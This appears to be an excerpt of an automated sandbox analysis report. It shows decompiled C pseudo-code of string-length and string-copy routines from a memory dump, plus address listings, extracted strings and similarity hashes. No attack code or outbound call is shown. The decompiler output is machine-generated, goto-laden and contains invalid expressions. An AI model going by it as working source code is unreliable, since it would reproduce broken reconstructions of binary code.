																				__eflags = _t428 - 0x7fffffff;
																				if(_t428 < 0x7fffffff) {
																					continue;
																				} else {
																					goto L112;
																				}
																				goto L113;
																			}
																		}
																	}
																	goto L113;
																}
																asm("bsf esi, ecx");
																_t428 = _t428 + _t225;
															} else {
																_t428 = 0;
																_t225 =  ~_t225 + 0x10;
																__eflags = _t225;
																while(1) {
																	__eflags =  *((char*)(_t428 + _t361));
																	if( *((char*)(_t428 + _t361)) == 0) {
																		goto L113;
																	}
																	_t428 = _t428 + 1;
																	__eflags = _t428 - _t225;
																	if(_t428 < _t225) {
																		continue;
																	} else {
																		goto L106;
																	}
																	goto L113;
																}
															}
															L113:
															__eflags = _t284;
															if(_t284 == 0) {
																_t226 = 0;
															} else {
																_t337 = _t284 & 0x0000000f;
																__eflags = _t337;
																if(_t337 == 0) {
																	L118:
																	asm("pxor xmm1, xmm1");
																	_v32 = _t400;
																	_t226 =  ~( ~_t337 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																	__eflags = _t226;
																	while(1) {
																		asm("movdqu xmm0, [ebx+ecx]");
																		asm("pcmpeqb xmm0, xmm1");
																		asm("pmovmskb edi, xmm0");
																		__eflags = _t400;
																		if(_t400 != 0) {
																			break;
																		}
																		_t337 = _t337 + 0x10;
																		__eflags = _t337 - _t226;
																		if(_t337 < _t226) {
																			continue;
																		} else {
																			_t400 = _v32;
																			__eflags = _t226 - 0x7fffffff;
																			if(_t226 >= 0x7fffffff) {
																				L124:
																				_t226 = 0x7fffffff;
																			} else {
																				while(1) {
																					__eflags =  *((char*)(_t226 + _t284));
																					if( *((char*)(_t226 + _t284)) == 0) {
																						goto L125;
																					}
																					_t226 = _t226 + 1;
																					__eflags = _t226 - 0x7fffffff;
																					if(_t226 < 0x7fffffff) {
																						continue;
																					} else {
																						goto L124;
																					}
																					goto L125;
																				}
																			}
																		}
																		goto L125;
																	}
																	_t259 = _t400;
																	asm("bsf eax, eax");
																	_t400 = _v32;
																	_t226 = _t259 + _t337;
																} else {
																	_t226 = 0;
																	_t337 =  ~_t337 + 0x10;
																	__eflags = _t337;
																	while(1) {
																		__eflags =  *((char*)(_t226 + _t284));
																		if( *((char*)(_t226 + _t284)) == 0) {
																			goto L125;
																		}
																		_t226 = _t226 + 1;
																		__eflags = _t226 - _t337;
																		if(_t226 < _t337) {
																			continue;
																		} else {
																			goto L118;
																		}
																		goto L125;
																	}
																}
															}
															L125:
															_t100 = _t226 + 1; // 0x80000000
															_t227 = _t428 + _t100;
															__eflags = _t227;
															if(_t227 != 0) {
																__eflags = _t227 - 0x40;
																_t228 =  <=  ? 0x40 : _t227;
																__eflags = _t228 - _v48;
																if(_t228 > _v48) {
																	goto L130;
																}
																goto L142;
															} else {
																__eflags = _t284;
																if(_t284 == 0) {
																	__eflags = _v48 - 0x40;
																	if(_v48 >= 0x40) {
																		goto L214;
																	} else {
																		goto L224;
																	}
																} else {
																	 *_t284 = 0;
																	_t242 = 0;
																	__eflags = _v48 - 0x40;
																	if(_v48 < 0x40) {
																		L224:
																		_t228 = 0x40;
																		L130:
																		_t331 = (_t228 >> 5 >> 0x1a) + _t228 >> 6;
																		_v48 = _t331;
																		_t245 = _t228 & 0x8000003f;
																		__eflags = _t245;
																		if(_t245 < 0) {
																			_t245 = (_t245 - 0x00000001 | 0xffffffc0) + 1;
																			__eflags = _t245;
																		}
																		__eflags = _t245;
																		_t333 = _t331 + (0 | _t245 > 0x00000000) << 6;
																		_v48 = _t333;
																		_push(_t333);
																		_v64 = _t361;
																		_t248 = E00411030();
																		_t361 = _v64;
																		_v60 = _t248;
																		_t439 = _t439 + 4;
																		__eflags = _t284;
																		if(_t284 == 0) {
																			 *_t248 = 0;
																		} else {
																			__eflags = _v60;
																			if(_v60 != 0) {
																				_t335 = _t248;
																				_t250 =  *_t284;
																				 *_t335 = _t250;
																				__eflags = _t250;
																				if(_t250 != 0) {
																					_v64 = _t361;
																					_t251 = 0;
																					__eflags = 0;
																					_v32 = _t400;
																					while(1) {
																						_t251 = _t251 + 1;
																						_t383 =  *((char*)(_t284 + _t251 * 2 - 1));
																						 *(_t335 + _t251 * 2 - 1) = _t383;
																						__eflags = _t383;
																						if(_t383 == 0) {
																							break;
																						}
																						_t384 =  *((char*)(_t284 + _t251 * 2));
																						 *(_t335 + _t251 * 2) = _t384;
																						__eflags = _t384;
																						if(_t384 != 0) {
																							continue;
																						}
																						break;
																					}
																					_t361 = _v64;
																					_t400 = _v32;
																				}
																			}
																			_push(1);
																			_push(_t284);
																			_v64 = _t361;
																			E004110B0();
																			_t361 = _v64;
																			_t439 = _t439 + 8;
																		}
																		_t284 = _v60;
																		L142:
																		_t326 = _t284;
																		__eflags = _t284;
																		if(_t284 == 0) {
																			goto L214;
																		} else {
																			_t242 =  *_t284;
																			goto L144;
																		}
																	} else {
																		_t326 = _t284;
																		L144:
																		__eflags = _t242;
																		if(_t242 != 0) {
																			_v32 = _t400;
																			_t244 = 0;
																			__eflags = 0;
																			while(1) {
																				_t244 = _t244 + 1;
																				_t403 = _t284 + _t244 * 2;
																				__eflags =  *(_t403 - 1);
																				_t326 = _t403 - 1;
																				if( *(_t403 - 1) == 0) {
																					break;
																				}
																				_t326 = _t403;
																				__eflags =  *_t403;
																				if( *_t403 != 0) {
																					continue;
																				}
																				break;
																			}
																			_t400 = _v32;
																		}
																		_t243 = _t326;
																		__eflags = _t428;
																		if(__eflags != 0) {
																			if(__eflags > 0) {
																				goto L152;
																			}
																		} else {
																			_t428 = 0x7fffffff;
																			L152:
																			_v40 = 0;
																			_v32 = _t400;
																			_v44 = _t284;
																			_t402 = _v40;
																			while(1) {
																				_t288 =  *((char*)(_t402 + _t361));
																				 *(_t402 + _t243) = _t288;
																				__eflags = _t288;
																				if(_t288 == 0) {
																					break;
																				}
																				_t141 = _t243 + 1; // 0x1
																				_t326 = _t402 + _t141;
																				_t402 = _t402 + 1;
																				__eflags = _t402 - _t428;
																				if(_t402 < _t428) {
																					continue;
																				}
																				break;
																			}
																			_t400 = _v32;
																			_t284 = _v44;
																		}
																		goto L156;
																	}
																}
															}
														}
													} else {
														goto L99;
													}
												}
												goto L200;
												L99:
												_t400 = _t400 + 1;
												__eflags = _t400 -  *_v36;
											} while (_t400 <  *_v36);
											goto L203;
											L214:
											_t400 = _t400 + 1;
											__eflags = _t400 -  *_v36;
										} while (_t400 <  *_v36);
										_t380 = _a4;
										 *_t380 = 0;
										 *((intOrPtr*)(_t380 + 4)) = 0;
										L191:
										_push(0x40);
										_t407 = E00411030();
										_t439 = _t439 + 4;
										_t206 =  *_a4;
										__eflags = _t206;
										if(_t206 == 0) {
											 *_t407 = 0;
										} else {
											__eflags = _t407;
											if(_t407 != 0) {
												_t345 =  *_t206;
												 *_t407 = _t345;
												__eflags = _t345;
												if(_t345 != 0) {
													_t304 = 0;
													__eflags = 0;
													while(1) {
														_t304 = _t304 + 1;
														_t346 =  *((char*)(_t206 + _t304 * 2 - 1));
														 *(_t407 + _t304 * 2 - 1) = _t346;
														__eflags = _t346;
														if(_t346 == 0) {
															goto L197;
														}
														_t347 =  *((char*)(_t206 + _t304 * 2));
														 *(_t407 + _t304 * 2) = _t347;
														__eflags = _t347;
														if(_t347 != 0) {
															continue;
														}
														goto L197;
													}
												}
											}
											L197:
											_push(1);
											_push(_t206);
											E004110B0();
											_t439 = _t439 + 8;
										}
										_t207 = _a4;
										 *_t207 = _t407;
										_t207[1] = 0x40;
										goto L200;
										L156:
										_t400 = _t400 + 1;
										 *_t326 = 0;
										__eflags = _t400 -  *_v36;
									} while (_t400 <  *_v36);
									L157:
									_t382 = _a4;
									_t203 = 0;
									__eflags = 0;
									 *_t382 = 0;
									 *((intOrPtr*)(_t382 + 4)) = 0;
									L158:
									__eflags =  *_t284;
									if( *_t284 == 0) {
										goto L191;
									} else {
										_t349 = _t284 & 0x0000000f;
										__eflags = _t349;
										if(_t349 == 0) {
											L163:
											asm("pxor xmm0, xmm0");
											_t414 =  ~( ~_t349 + 0x0000000f & 0x0000000f) + 0x7fffffff;
											__eflags = _t414;
											while(1) {
												asm("movdqu xmm1, [ebx+edx]");
												asm("pcmpeqb xmm1, xmm0");
												asm("pmovmskb eax, xmm1");
												__eflags = _t203;
												if(_t203 != 0) {
													break;
												}
												_t349 = _t349 + 0x10;
												__eflags = _t349 - _t414;
												if(_t349 < _t414) {
													continue;
												} else {
													__eflags = _t414 - 0x7fffffff;
													if(_t414 >= 0x7fffffff) {
														L169:
														_t414 = 0x7fffffff;
													} else {
														while(1) {
															__eflags =  *((char*)(_t414 + _t284));
															if( *((char*)(_t414 + _t284)) == 0) {
																goto L170;
															}
															_t414 = _t414 + 1;
															__eflags = _t414 - 0x7fffffff;
															if(_t414 < 0x7fffffff) {
																continue;
															} else {
																goto L169;
															}
															goto L170;
														}
													}
												}
												goto L170;
											}
											asm("bsf esi, eax");
											_t414 = _t414 + _t349;
										} else {
											_t414 = 0;
											_t349 =  ~_t349 + 0x10;
											__eflags = _t349;
											while(1) {
												__eflags =  *((char*)(_t414 + _t284));
												if( *((char*)(_t414 + _t284)) == 0) {
													goto L170;
												}
												_t414 = _t414 + 1;
												__eflags = _t414 - _t349;
												if(_t414 < _t349) {
													continue;
												} else {
													goto L163;
												}
												goto L170;
											}
										}
										L170:
										_t149 = _t414 + 1; // 0x80000000
										_t350 = _t149;
										__eflags = _t350 - 0x40;
										_t351 =  <=  ? 0x40 : _t350;
										__eflags = _t351;
										if(_t351 > 0) {
											_t396 = (_t351 >> 5 >> 0x1a) + _t351 >> 6;
											_t352 = _t351 & 0x8000003f;
											__eflags = _t352;
											if(_t352 < 0) {
												_t352 = (_t352 - 0x00000001 | 0xffffffc0) + 1;
												__eflags = _t352;
											}
											__eflags = _t352;
											_t398 = _t396 + (0 | _t352 > 0x00000000) << 6;
											_push(_t398);
											_t353 = E00411030();
											_t439 = _t439 + 4;
											_t305 =  *_a4;
											__eflags = _t305;
											if(_t305 == 0) {
												 *_t353 = 0;
											} else {
												__eflags = _t353;
												if(_t353 != 0) {
													_t219 =  *_t305;
													 *_t353 = _t219;
													__eflags = _t219;
													if(_t219 != 0) {
														__eflags = 0;
														_v68 = _t414;
														_v44 = _t284;
														_t286 = 0;
														while(1) {
															_t286 = _t286 + 1;
															_t221 =  *((char*)(_t305 + _t286 * 2 - 1));
															 *(_t353 + _t286 * 2 - 1) = _t221;
															__eflags = _t221;
															if(_t221 == 0) {
																break;
															}
															_t222 =  *((char*)(_t305 + _t286 * 2));
															 *(_t353 + _t286 * 2) = _t222;
															__eflags = _t222;
															if(_t222 != 0) {
																continue;
															}
															break;
														}
														_t414 = _v68;
														_t284 = _v44;
													}
												}
												_push(1);
												_push(_t305);
												_v68 = _t353;
												E004110B0();
												_t353 = _v68;
												_t439 = _t439 + 8;
											}
											_t216 = _a4;
											_t216[1] = _t398;
											 *_t216 = _t353;
										} else {
											_t353 = 0;
										}
										_t306 = _t284;
										__eflags = _t353;
										if(_t353 != 0) {
											_t399 = 0;
											while(1) {
												_t217 =  *_t306;
												_t399 = _t399 + 1;
												 *_t353 = _t217;
												__eflags = _t414;
												if(_t414 == 0) {
													goto L189;
												}
												__eflags = _t399 - _t414;
												if(_t399 == _t414) {
													 *(_t353 + 1) = 0;
												} else {
													goto L189;
												}
												goto L200;
												L189:
												__eflags = _t217;
												if(_t217 != 0) {
													_t353 = _t353 + 1;
													_t306 = _t306 + 1;
													__eflags = _t306;
													continue;
												}
												goto L200;
											}
										}
									}
								}
							}
						}
					}
					L200:
					_push(1);
					_push(_t284);
					E004110B0();
					return _a4;
				} else {
					_t386 = _a4;
					_push(0x40);
					 *_t386 = 0;
					 *((intOrPtr*)(_t386 + 4)) = 0;
					_t300 = E00411030();
					_t441 = _t439 + 4;
					_t280 =  *_a4;
					if(_t280 == 0) {
						 *_t300 = 0;
					} else {
						if(_t300 != 0) {
							_t387 =  *_t280;
							 *_t300 = _t387;
							if(_t387 != 0) {
								_t388 = 0;
								while(1) {
									_t388 = _t388 + 1;
									_t340 =  *((char*)(_t280 + _t388 * 2 - 1));
									 *((char*)(_t300 + _t388 * 2 - 1)) = _t340;
									if(_t340 == 0) {
										goto L7;
									}
									_t341 =  *((char*)(_t280 + _t388 * 2));
									 *((char*)(_t300 + _t388 * 2)) = _t341;
									if(_t341 != 0) {
										continue;
									}
									goto L7;
								}
							}
						}
						L7:
						_push(1);
						_push(_t280);
						E004110B0();
						_t441 = _t441 + 8;
					}
					_t281 = _a4;
					_t281[1] = 0x40;
					 *_t281 = _t300;
					return _t281;
				}
				L225:
			}

0x00427669
0x0042766c
0x0042766e
0x00427672
0x004276e8
0x004276ea
0x004276ec
0x0042782b
0x0042782b
0x00427832
0x00427834
0x00427837
0x0042783a
0x0042783d
0x00000000
0x00427843
0x00427843
0x00000000
0x00427843
0x004276f2
0x004276f2
0x004276f5
0x00000000
0x004276fb
0x004276fd
0x004276fd
0x00427700
0x00427722
0x00427726
0x00427732
0x00427732
0x00427738
0x0042773c
0x0042773e
0x0042773e
0x00427743
0x00427747
0x0042774b
0x0042774d
0x00000000
0x00000000
0x00427753
0x00427756
0x00427758
0x00000000
0x0042775a
0x0042775a
0x0042775e
0x00427766
0x0042777c
0x0042777c
0x00427768
0x00427768
0x0042776a
0x0042776a
0x0042776e
0x00000000
0x00000000
0x00427774
0x00427775
0x0042777a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042777a
0x00427f0c
0x00427f0c
0x00427766
0x00000000
0x00427758
0x00427f15
0x00427f1a
0x00427702
0x00427702
0x0042770c
0x00427710
0x00427710
0x00427713
0x00427713
0x00427717
0x00000000
0x00000000
0x0042771d
0x0042771e
0x00427720
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00427720
0x00427f23
0x00427f23
0x00427784
0x0042778d
0x00427790
0x00427793
0x00427796
0x00427798
0x004277b6
0x004277b9
0x004277b9
0x004277be
0x004277c6
0x004277c6
0x004277c6
0x004277c7
0x004277d3
0x004277d6
0x004277d7
0x004277db
0x004277e0
0x004277e4
0x004277e6
0x004277ed
0x004277f5
0x004277f9
0x004277fd
0x00427800
0x00427803
0x00427807
0x0042780f
0x0042780f
0x00427812
0x00427813
0x00427815
0x00427817
0x00000000
0x00000000
0x00427819
0x0042781b
0x00427ee2
0x00427ee6
0x00427ee9
0x00427eed
0x00000000
0x00000000
0x00000000
0x00427ef1
0x00427ef1
0x00427ef4
0x00000000
0x00427efa
0x00000000
0x00427efa
0x00000000
0x00427821
0x00427821
0x00427823
0x00427eff
0x00427f03
0x00427f06
0x00427829
0x0042780d
0x0042780e
0x0042780e
0x00000000
0x0042780e
0x00000000
0x00427823
0x0042779a
0x0042779a
0x0042779c
0x0042779f
0x00427ecb
0x00427ecb
0x00427ece
0x00427ed0
0x00427ed2
0x00427ed5
0x00427ed7
0x00000000
0x00427edd
0x00000000
0x00427edd
0x004277a5
0x004277a5
0x00427848
0x00427848
0x00427850
0x00427855
0x0042785b
0x0042785b
0x0042785e
0x00427862
0x00427866
0x0042786a
0x0042786e
0x0042786e
0x00427870
0x00427870
0x00427870
0x00427870
0x00427870
0x00427874
0x0042787a
0x0042787d
0x00427880
0x00427886
0x00427889
0x0042788f
0x00427893
0x00427895
0x004278b5
0x004278b9
0x004278c8
0x004278c8
0x004278ce
0x004278ce
0x004278d3
0x004278d7
0x004278db
0x004278dd
0x00000000
0x00000000
0x004278e3
0x004278e6
0x004278e8
0x00000000
0x004278ea
0x004278ea
0x004278f0
0x00427904
0x00427904
0x004278f2
0x004278f2
0x004278f5
0x004278f5
0x004278f9
0x00000000
0x00000000
0x004278fb
0x004278fc
0x00427902
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00427902
0x004278f5
0x004278f0
0x00000000
0x004278e8
0x00427f8f
0x00427f92
0x00427897
0x00427897
0x0042789b
0x0042789b
0x0042789d
0x004278a0
0x004278a2
0x004278a2
0x004278a6
0x00000000
0x00000000
0x004278ac
0x004278ad
0x004278af
0x00000000
0x004278b1
0x004278b1
0x00000000
0x004278b1
0x00000000
0x004278af
0x00427f99
0x00427f99
0x00427909
0x00427909
0x0042790b
0x00427f88
0x00427911
0x00427913
0x00427913
0x00427916
0x0042792a
0x0042792e
0x0042793a
0x0042793a
0x00427940
0x00427940
0x00427945
0x00427949
0x0042794d
0x0042794f
0x00000000
0x00000000
0x00427955
0x00427958
0x0042795a
0x00000000
0x0042795c
0x0042795c
0x00427962
0x00427973
0x00427973
0x00000000
0x00427964
0x00427964
0x00427968
0x00000000
0x00000000
0x0042796a
0x0042796b
0x00427971
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00427971
0x00427964
0x00427962
0x00000000
0x0042795a
0x00427f7e
0x00427f81
0x00427918
0x0042791a
0x0042791c
0x0042791c
0x0042791f
0x0042791f
0x00427923
0x00000000
0x00000000
0x00427925
0x00427926
0x00427928
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00427928
0x0042791f
0x00427916
0x00427978
0x00427978
0x00427978
0x0042797c
0x0042797e
0x004279a4
0x004279a7
0x004279aa
0x004279ae
0x00000000
0x00000000
0x00000000
0x00427980
0x00427980
0x00427982
0x00427f2c
0x00427f31
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00427988
0x00427988
0x0042798b
0x0042798d
0x00427992
0x00427f37
0x00427f37
0x004279b4
0x004279be
0x004279c1
0x004279c5
0x004279c5
0x004279cb
0x004279d3
0x004279d3
0x004279d3
0x004279d6
0x004279dd
0x004279e0
0x004279e4
0x004279e5
0x004279ea
0x004279ee
0x004279f1
0x004279f3
0x00427a3a
0x004279f5
0x004279f5
0x004279f9
0x004279fb
0x004279fd
0x00427a00
0x00427a02
0x00427a04
0x00427a06
0x00427a0a
0x00427a0a
0x00427a0c
0x00427a0e
0x00427a0e
0x00427a0f
0x00427a14
0x00427a18
0x00427a1a
0x00000000
0x00000000
0x00427a1c
0x00427a20
0x00427a23
0x00427a25
0x00000000
0x00000000
0x00000000
0x00427a25
0x00427a27
0x00427a27
0x00427a04
0x00427a2b
0x00427a2d
0x00427a2e
0x00427a33
0x00427a33
0x00427a3d
0x00427a40
0x00427a40
0x00427a42
0x00427a44
0x00427a46
0x00000000
0x00427a46
0x00427998
0x00427998
0x00427a49
0x00427a49
0x00427a4b
0x00427a4d
0x00427a4d
0x00427a4f
0x00427a4f
0x00427a50
0x00427a53
0x00427a57
0x00427a57
0x00427a5a
0x00000000
0x00000000
0x00427a5c
0x00427a5e
0x00427a61
0x00000000
0x00000000
0x00000000
0x00427a61
0x00427a4f
0x00427a63
0x00427a63
0x00427a65
0x00427a67
0x00427a70
0x00000000
0x00000000
0x00427a69
0x00427a69
0x00427a72
0x00427a72
0x00427a76
0x00427a76
0x00427a78
0x00427a7c
0x00427a7f
0x00427a7f
0x00427a83
0x00427a86
0x00427a88
0x00000000
0x00000000
0x00427a8a
0x00427a8a
0x00427a8e
0x00427a8f
0x00427a91
0x00000000
0x00000000
0x00000000
0x00427a91
0x00427a93
0x00427a97
0x00427a97
0x00427a9b
0x00427a9b
0x00427992
0x00427982
0x0042797e
0x00427889
0x00427880
0x00427a9e
0x00427aa2
0x00427aa8
0x00427aaa
0x00427aac
0x00000000
0x00427aae
0x00427aae
0x00427ab1
0x00427ac5
0x00427ac7
0x00000000
0x00427ac9
0x00427acb
0x00427acb
0x00427ace
0x00427ae2
0x00427ae6
0x00427af2
0x00427af2
0x00427af8
0x00427af8
0x00427afd
0x00427b01
0x00427b05
0x00427b07
0x00000000
0x00000000
0x00427b0d
0x00427b10
0x00427b12
0x00000000
0x00427b14
0x00427b14
0x00427b1a
0x00427b2b
0x00427b2b
0x00000000
0x00427b1c
0x00427b1c
0x00427b20
0x00000000
0x00000000
0x00427b22
0x00427b23
0x00427b29
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00427b29
0x00427b1c
0x00427b1a
0x00000000
0x00427b12
0x00427f74
0x00427f77
0x00427ad0
0x00427ad2
0x00427ad4
0x00427ad4
0x00427ad7
0x00427ad7
0x00427adb
0x00000000
0x00000000
0x00427add
0x00427ade
0x00427ae0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00427ae0
0x00427ad7
0x00427b30
0x00427b30
0x00427b32
0x00427f6d
0x00427b38
0x00427b3a
0x00427b3a
0x00427b3d
0x00427b51
0x00427b55
0x00427b61
0x00427b65
0x00427b65
0x00427b6a
0x00427b6a
0x00427b6f
0x00427b73
0x00427b77
0x00427b79
0x00000000
0x00000000
0x00427b7f
0x00427b82
0x00427b84
0x00000000
0x00427b86
0x00427b86
0x00427b8a
0x00427b8f
0x00427b9f
0x00427b9f
0x00000000
0x00427b91
0x00427b91
0x00427b95
0x00000000
0x00000000
0x00427b97
0x00427b98
0x00427b9d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00427b9d
0x00427b91
0x00427b8f
0x00000000
0x00427b84
0x00427f5d
0x00427f5f
0x00427f62
0x00427f66
0x00427b3f
0x00427b41
0x00427b43
0x00427b43
0x00427b46
0x00427b46
0x00427b4a
0x00000000
0x00000000
0x00427b4c
0x00427b4d
0x00427b4f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00427b4f
0x00427b46
0x00427b3d
0x00427ba4
0x00427ba4
0x00427ba4
0x00427ba8
0x00427baa
0x00427bd0
0x00427bd3
0x00427bd6
0x00427bda
0x00000000
0x00000000
0x00000000
0x00427bac
0x00427bac
0x00427bae
0x00427fa2
0x00427fa7
0x00000000
0x00000000
0x00000000
0x00000000
0x00427bb4
0x00427bb4
0x00427bb7
0x00427bb9
0x00427bbe
0x00427fa9
0x00427fa9
0x00427be0
0x00427bea
0x00427bed
0x00427bf1
0x00427bf1
0x00427bf6
0x00427bfe
0x00427bfe
0x00427bfe
0x00427bff
0x00427c0b
0x00427c0e
0x00427c12
0x00427c13
0x00427c17
0x00427c1c
0x00427c20
0x00427c24
0x00427c27
0x00427c29
0x00427c7f
0x00427c2b
0x00427c2b
0x00427c30
0x00427c32
0x00427c34
0x00427c37
0x00427c39
0x00427c3b
0x00427c3d
0x00427c41
0x00427c41
0x00427c43
0x00427c47
0x00427c47
0x00427c48
0x00427c4d
0x00427c51
0x00427c53
0x00000000
0x00000000
0x00427c55
0x00427c59
0x00427c5c
0x00427c5e
0x00000000
0x00000000
0x00000000
0x00427c5e
0x00427c60
0x00427c64
0x00427c64
0x00427c3b
0x00427c68
0x00427c6a
0x00427c6b
0x00427c6f
0x00427c74
0x00427c78
0x00427c78
0x00427c82
0x00427c86
0x00427c86
0x00427c88
0x00427c8a
0x00000000
0x00427c90
0x00427c90
0x00000000
0x00427c90
0x00427bc4
0x00427bc4
0x00427c93
0x00427c93
0x00427c95
0x00427c97
0x00427c9b
0x00427c9b
0x00427c9d
0x00427c9d
0x00427c9e
0x00427ca1
0x00427ca5
0x00427ca8
0x00000000
0x00000000
0x00427caa
0x00427cac
0x00427caf
0x00000000
0x00000000
0x00000000
0x00427caf
0x00427cb1
0x00427cb1
0x00427cb5
0x00427cb7
0x00427cb9
0x00427cc2
0x00000000
0x00000000
0x00427cbb
0x00427cbb
0x00427cc4
0x00427cc4
0x00427ccc
0x00427cd0
0x00427cd4
0x00427cd8
0x00427cd8
0x00427cdc
0x00427cdf
0x00427ce1
0x00000000
0x00000000
0x00427ce3
0x00427ce3
0x00427ce7
0x00427ce8
0x00427cea
0x00000000
0x00000000
0x00000000
0x00427cea
0x00427cec
0x00427cf0
0x00427cf0
0x00000000
0x00427cb9
0x00427bbe
0x00427bae
0x00427baa
0x00000000
0x00000000
0x00000000
0x00427ab1
0x00000000
0x00427ab3
0x00427ab7
0x00427ab8
0x00427ab8
0x00000000
0x00427f41
0x00427f45
0x00427f46
0x00427f46
0x00427f4e
0x00427f53
0x00427f55
0x00427e4b
0x00427e4b
0x00427e52
0x00427e54
0x00427e5a
0x00427e5c
0x00427e5e
0x00427e95
0x00427e60
0x00427e60
0x00427e62
0x00427e64
0x00427e67
0x00427e69
0x00427e6b
0x00427e6d
0x00427e6d
0x00427e6f
0x00427e6f
0x00427e70
0x00427e75
0x00427e79
0x00427e7b
0x00000000
0x00000000
0x00427e7d
0x00427e81
0x00427e84
0x00427e86
0x00000000
0x00000000
0x00000000
0x00427e86
0x00427e6f
0x00427e6b
0x00427e88
0x00427e88
0x00427e8a
0x00427e8b
0x00427e90
0x00427e90
0x00427e98
0x00427e9b
0x00427e9d
0x00000000
0x00427cf4
0x00427cf8
0x00427cf9
0x00427cfc
0x00427cfc
0x00427d04
0x00427d04
0x00427d07
0x00427d07
0x00427d09
0x00427d0b
0x00427d0e
0x00427d0e
0x00427d11
0x00000000
0x00427d17
0x00427d19
0x00427d19
0x00427d1c
0x00427d30
0x00427d34
0x00427d40
0x00427d40
0x00427d46
0x00427d46
0x00427d4b
0x00427d4f
0x00427d53
0x00427d55
0x00000000
0x00000000
0x00427d5b
0x00427d5e
0x00427d60
0x00000000
0x00427d62
0x00427d62
0x00427d68
0x00427d79
0x00427d79
0x00000000
0x00427d6a
0x00427d6a
0x00427d6e
0x00000000
0x00000000
0x00427d70
0x00427d71
0x00427d77
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00427d77
0x00427d6a
0x00427d68
0x00000000
0x00427d60
0x00427ec1
0x00427ec4
0x00427d1e
0x00427d20
0x00427d22
0x00427d22
0x00427d25
0x00427d25
0x00427d29
0x00000000
0x00000000
0x00427d2b
0x00427d2c
0x00427d2e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00427d2e
0x00427d25
0x00427d7e
0x00427d83
0x00427d83
0x00427d86
0x00427d89
0x00427d8c
0x00427d8e
0x00427da1
0x00427da4
0x00427da4
0x00427daa
0x00427db2
0x00427db2
0x00427db2
0x00427db5
0x00427dbc
0x00427dbf
0x00427dc5
0x00427dc7
0x00427dcd
0x00427dcf
0x00427dd1
0x00427e20
0x00427dd3
0x00427dd3
0x00427dd5
0x00427dd7
0x00427dda
0x00427ddc
0x00427dde
0x00427de0
0x00427de2
0x00427de5
0x00427de9
0x00427deb
0x00427deb
0x00427dec
0x00427df1
0x00427df5
0x00427df7
0x00000000
0x00000000
0x00427df9
0x00427dfd
0x00427e00
0x00427e02
0x00000000
0x00000000
0x00000000
0x00427e02
0x00427e04
0x00427e07
0x00427e07
0x00427dde
0x00427e0b
0x00427e0d
0x00427e0e
0x00427e12
0x00427e17
0x00427e1b
0x00427e1b
0x00427e23
0x00427e26
0x00427e29
0x00427d90
0x00427d90
0x00427d90
0x00427e2b
0x00427e2d
0x00427e2f
0x00427e31
0x00427e37
0x00427e37
0x00427e3a
0x00427e3b
0x00427e3d
0x00427e3f
0x00000000
0x00000000
0x00427e41
0x00427e43
0x00427ebb
0x00000000
0x00000000
0x00000000
0x00000000
0x00427e45
0x00427e45
0x00427e47
0x00427e35
0x00427e36
0x00427e36
0x00000000
0x00427e36
0x00000000
0x00427e47
0x00427e37
0x00427e2f
0x00427d11
0x0042779f
0x00427798
0x004276f5
0x00427ea4
0x00427ea4
0x00427ea6
0x00427ea7
0x00427eb8
0x00427674
0x00427674
0x00427679
0x0042767b
0x0042767d
0x00427685
0x00427687
0x0042768d
0x00427691
0x004276c8
0x00427693
0x00427695
0x00427697
0x0042769a
0x0042769e
0x004276a0
0x004276a2
0x004276a2
0x004276a3
0x004276a8
0x004276ae
0x00000000
0x00000000
0x004276b0
0x004276b4
0x004276b9
0x00000000
0x00000000
0x00000000
0x004276b9
0x004276a2
0x0042769e
0x004276bb
0x004276bb
0x004276bd
0x004276be
0x004276c3
0x004276c3
0x004276cb
0x004276ce
0x004276d5
0x004276e0
0x004276e0
0x00000000

Strings

w8C, xrefs: 0042787A, 00427A7C, 004278C5, 00427886, 0042789D, 004278F2
@, xrefs: 00427FA2
w8C, xrefs: 00427848

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: @$w8C$w8C
API String ID: 0-498522260
Opcode ID: 52cf54630ff8bdc2b50b66d371acd1fbb21b2ea9802d435e193b7f6b95655d85
Instruction ID: a271ce2d8a1f051ca634d997067b0dc261c8a80339b66250db5d22cb3a82338e
Opcode Fuzzy Hash: 52cf54630ff8bdc2b50b66d371acd1fbb21b2ea9802d435e193b7f6b95655d85
Instruction Fuzzy Hash: B3524B71B0C3624BD7158E38D48032B7BD1AF96310F69866ED8958B392DA3CCD41C79A

Uniqueness

Uniqueness Score: -1.00%

Function 00401570, Relevance: 3.6, Strings: 2, Instructions: 1143
COMMONCrypto

Download Yara Rule

C-Code - Quality: 41%

			E00401570(signed int __ecx, void* __edx, void* __eflags) {
				char _v44;
				intOrPtr _v48;
				char _v56;
				char _v72;
				char _v80;
				void* _v116;
				char _v124;
				char _v128;
				signed int _v136;
				char _v140;
				char _v144;
				void* _v148;
				char _v152;
				signed int _v156;
				signed int _v160;
				intOrPtr _v164;
				signed int _v168;
				char _v172;
				char _v176;
				void* _v184;
				void* _v188;
				void* _v192;
				char _v196;
				void* _v212;
				char _v216;
				void* _v220;
				char _v224;
				char _v228;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				void* _v252;
				intOrPtr _v276;
				char _v280;
				char _v288;
				void* _v292;
				char _v296;
				void* _v300;
				intOrPtr _v308;
				signed int _v328;
				void* _v348;
				void* _v352;
				char _v356;
				char _v368;
				char _v372;
				void* _v380;
				char _v384;
				char _v388;
				char _v392;
				char _v396;
				char _v400;
				char _v408;
				char _v412;
				char _v416;
				char _v420;
				char _v428;
				char _v432;
				char _v436;
				char _v444;
				char _v448;
				char _v452;
				char _v456;
				char _v460;
				char _v464;
				char _v468;
				char _v472;
